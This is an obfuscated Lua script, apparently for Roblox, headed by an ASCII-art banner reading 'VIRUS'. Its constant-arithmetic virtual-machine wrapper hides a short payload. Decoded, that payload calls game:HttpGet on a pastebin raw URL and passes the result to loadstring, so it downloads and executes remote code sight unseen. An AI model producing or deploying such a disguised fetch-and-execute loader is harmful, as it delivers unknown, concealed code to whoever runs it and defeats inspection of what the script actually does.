--[[

 ██▒   █▓ ██▓ ██▀███   █    ██   ██████ 
▓██░   █▒▓██▒▓██ ▒ ██▒ ██  ▓██▒▒██    ▒ 
 ▓██  █▒░▒██▒▓██ ░▄█ ▒▓██  ▒██░░ ▓██▄   
  ▒██ █░░░██░▒██▀▀█▄  ▓▓█  ░██░  ▒   ██▒
   ▒▀█░  ░██░░██▓ ▒██▒▒▒█████▓ ▒██████▒▒
   ░ ▐░  ░▓  ░ ▒▓ ░▒▓░░▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ░
   ░ ░░   ▒ ░  ░▒ ░ ▒░░░▒░ ░ ░ ░ ░▒  ░ ░
     ░░   ▒ ░  ░░   ░  ░░░ ░ ░ ░  ░  ░  
      ░   ░     ░        ░           ░  
     ░                                  

]]

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v88,v19);v19=nil;v109=1;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=877 -(282 + 595) ;local v90;while true do if (v89==0) then v90=(v31/((5 -(1640 -(1523 + 114)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(499 + 56 + (91 -27))))) + (932 -(857 + 74)))) ;return v90-(v90%(569 -(367 + 201))) ;end end else local v91=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v91 + v91))>=v91) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==((781 + 284) -(68 + 997))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (1272 -(226 + 1044)) ;v35=(9 -5) -3 ;end if (v35==(118 -(24 + 8 + 85))) then return (v37 * (251 + 5)) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v41 * 16777216) + (v40 * 65536) + (v39 * (689 -433)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,(439 -(145 + 293)) + 0 ,1017 -(915 + 82) ) * ((5 -3)^(19 + 13))) + v42 ;local v46=v20(v43,27 -6 ,1218 -((1499 -(44 + 386)) + 118) );local v47=((v20(v43,72 -40 )==((3 -2) -(1486 -(998 + 488)))) and  -(1 + 0)) or 1 ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * 0 ;else v46=(340 + 452) -(368 + 423) ;v44=0 -(0 -0) ;end elseif (v46==((657 + 1408) -(10 + 7 + 1))) then return ((v45==0) and (v47 * ((773 -(201 + 571))/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((7 -5)^(494 -(416 + 26))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(1138 -(116 + 1022))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v66=1 + 0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do local v108=(function() return 0 -0 ;end)();while true do if (v108~=(0 -0)) then else if (1==v101) then local v120=(function() return 0;end)();while true do if (v120==(0 + 0)) then while true do if (0==v92) then v93=(function() return v94();end)();if (v95(v93, #"[", #"<")~=(1474 -(1329 + 145))) then else local v168=(function() return 0;end)();local v169=(function() return;end)();local v170=(function() return;end)();local v171=(function() return;end)();while true do if (v168==0) then v169=(function() return v95(v93,973 -(140 + 831) , #"asd");end)();v170=(function() return v95(v93, #"0313",1856 -(1409 + 441) );end)();v168=(function() return 719 -(15 + 703) ;end)();end if (v168==(2 + 1)) then if (v95(v170, #"asd", #"-19")== #"~") then v171[ #".com"]=(function() return v98[v171[ #".dev"]];end)();end v99[v100]=(function() return v171;end)();break;end if (v168==(440 -(262 + 176))) then if (v95(v170, #",", #"|")~= #"\\") then else v171[2]=(function() return v98[v171[1723 -(345 + 1376) ]];end)();end if (v95(v170,690 -(198 + 490) ,8 -6 )~= #"\\") then else v171[ #"asd"]=(function() return v98[v171[ #"xxx"]];end)();end v168=(function() return 6 -3 ;end)();end if (v168==(1207 -(696 + 510))) then v171=(function() return {v96(),v96(),nil,nil};end)();if (v169==(1262 -(1091 + 171))) then local v176=(function() return 0 + 0 ;end)();while true do if (v176==(0 -0)) then v171[ #"19("]=(function() return v96();end)();v171[ #".dev"]=(function() return v96();end)();break;end end elseif (v169== #",") then v171[ #"-19"]=(function() return v97();end)();elseif (v169==2) then v171[ #"91("]=(function() return v97() -(2^(52 -36)) ;end)();elseif (v169== #"gha") then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (v181==0) then v182=(function() return 0;end)();while true do if (v182~=0) then else v171[ #"91("]=(function() return v97() -((376 -(123 + 251))^16) ;end)();v171[ #"asd1"]=(function() return v96();end)();break;end end break;end end end v168=(function() return 2;end)();end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end if (v101~=0) then else local v121=(function() return 0;end)();while true do if (0~=v121) then else v92=(function() return 0 -0 ;end)();v93=(function() return nil;end)();v121=(function() return 1;end)();end if (v121==(699 -(208 + 490))) then v101=(function() return 1 + 0 ;end)();break;end end end break;end end end end;end)();local v52=(function() return function(v102,v103,v104) local v105=(function() return 0 + 0 ;end)();while true do if ((836 -(660 + 176))==v105) then local v116=(function() return 0;end)();local v117=(function() return;end)();while true do if (v116==(0 + 0)) then v117=(function() return 0;end)();while true do if (v117==(202 -(14 + 188))) then v102[v103-#"!" ]=(function() return v104();end)();return v102,v103,v104;end end break;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"[",v57 do local v69=(function() return 675 -(534 + 141) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v69==(1 + 0)) then if (v70== #",") then v71=(function() return v21()~=(0 + 0) ;end)();elseif (v70==(2 + 0)) then v71=(function() return v24();end)();elseif (v70~= #"91(") then else v71=(function() return v25();end)();end v58[v68]=(function() return v71;end)();break;end if (v69~=0) then else v70=(function() return v21();end)();v71=(function() return nil;end)();v69=(function() return 1 -0 ;end)();end end end v56[ #"19("]=(function() return v21();end)();for v72= #"<",v23() do FlatIdent_43862,Descriptor,v21,v20,v22,v23,v58,v53,v72=(function() return v51(FlatIdent_43862,Descriptor,v21,v20,v22,v23,v58,v53,v72);end)();end for v73= #">",v23() do v54,v73,v28=(function() return v52(v54,v73,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[5 -3 ];local v65=v60[2 + 1 ];return function(...) local v74=v63;local v75=v64;local v76=v65;local v77=v27;local v78=1 + 0 ;local v79= -(397 -((1615 -(1408 + 92)) + 281));local v80={};local v81={...};local v82=v12("#",...) -1 ;local v83={};local v84={};for v106=(1288 -(993 + 295)) -0 ,v82 do if ((v106>=v76) or (3390<=3060)) then v80[v106-v76 ]=v81[v106 + 1 + 0 ];else v84[v106]=v81[v106 + (2 -1) ];end end local v85=(v82-v76) + (3 -2) ;local v86;local v87;while true do local v107=0;while true do if (v107==(867 -(550 + 317))) then v86=v74[v78];v87=v86[1 -(0 + 0) ];v107=1 -0 ;end if (v107==((1173 -(418 + 753)) -1)) then if ((2455==2455) and (v87<=(2 + 1))) then if (v87<=1) then if (v87==0) then local v123;local v124,v125;local v126;local v127;v84[v86[(30 + 257) -(134 + 151) ]]=v62[v86[1668 -(284 + 686 + 695) ]];v78=v78 + (1 -0) ;v86=v74[v78];v84[v86[1992 -(582 + 1408) ]]=v62[v86[(3 + 7) -7 ]];v78=v78 + (1 -0) ;v86=v74[v78];v127=v86[7 -5 ];v126=v84[v86[3]];v84[v127 + (1825 -(1195 + (1158 -(406 + 123)))) ]=v126;v84[v127]=v126[v86[5 -1 ]];v78=v78 + (242 -(187 + 54)) ;v86=v74[v78];v84[v86[(2551 -(1749 + 20)) -(39 + 123 + 618) ]]=v86[3 + 0 ];v78=v78 + 1 ;v86=v74[v78];v127=v86[2 + (1322 -(1249 + 73)) ];v124,v125=v77(v84[v127](v13(v84,v127 + (1 -0) ,v86[3])));v79=(v125 + v127) -(1 -0) ;v123=0 + 0 ;for v156=v127,v79 do v123=v123 + 1 ;v84[v156]=v124[v123];end v78=v78 + (1637 -(1373 + 263)) ;v86=v74[v78];v127=v86[1002 -(451 + 549) ];v84[v127]=v84[v127](v13(v84,v127 + 1 ,v79));v78=v78 + 1 ;v86=v74[v78];v84[v86[1 + 1 ]]();v78=v78 + (1 -0) ;v86=v74[v78];do return;end else v84[v86[2 -0 ]]=v86[1387 -(746 + 638) ];end elseif ((v87>(1 + 1)) or (999>2693)) then v84[v86[2 -0 ]]();else v84[v86[2]]=v62[v86[344 -(218 + 123) ]];end elseif (v87<=(1586 -(548 + 987 + 46))) then if ((v87>4) or (4740<=3736)) then local v146=0 + 0 ;local v147;local v148;while true do if ((463<601) and (v146==(1 + 0))) then v84[v147 + (561 -(306 + 254)) ]=v148;v84[v147]=v148[v86[1 + 3 ]];break;end if ((0 -0)==v146) then v147=v86[1469 -(899 + (1713 -(466 + 679))) ];v148=v84[v86[2 + (2 -1) ]];v146=2 -1 ;end end else local v149=603 -(268 + 335) ;local v150;local v151;local v152;local v153;while true do if (v149==(291 -((171 -111) + 230))) then v79=(v152 + v150) -(573 -(426 + 146)) ;v153=0 + 0 ;v149=1458 -(282 + 1174) ;end if (v149==(811 -(569 + 242))) then v150=v86[5 -3 ];v151,v152=v77(v84[v150](v13(v84,v150 + 1 + 0 ,v86[1027 -(706 + 318) ])));v149=1252 -(721 + 530) ;end if ((v149==(1273 -(945 + 326))) or (2183<687)) then for v165=v150,v79 do v153=v153 + (2 -1) ;v84[v165]=v151[v153];end break;end end end elseif ((4549==4549) and (v87==(6 + 0))) then do return;end else local v154=v86[2];v84[v154]=v84[v154](v13(v84,v154 + (701 -(271 + 429)) ,v79));end v78=v78 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F7155796B7537553400083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
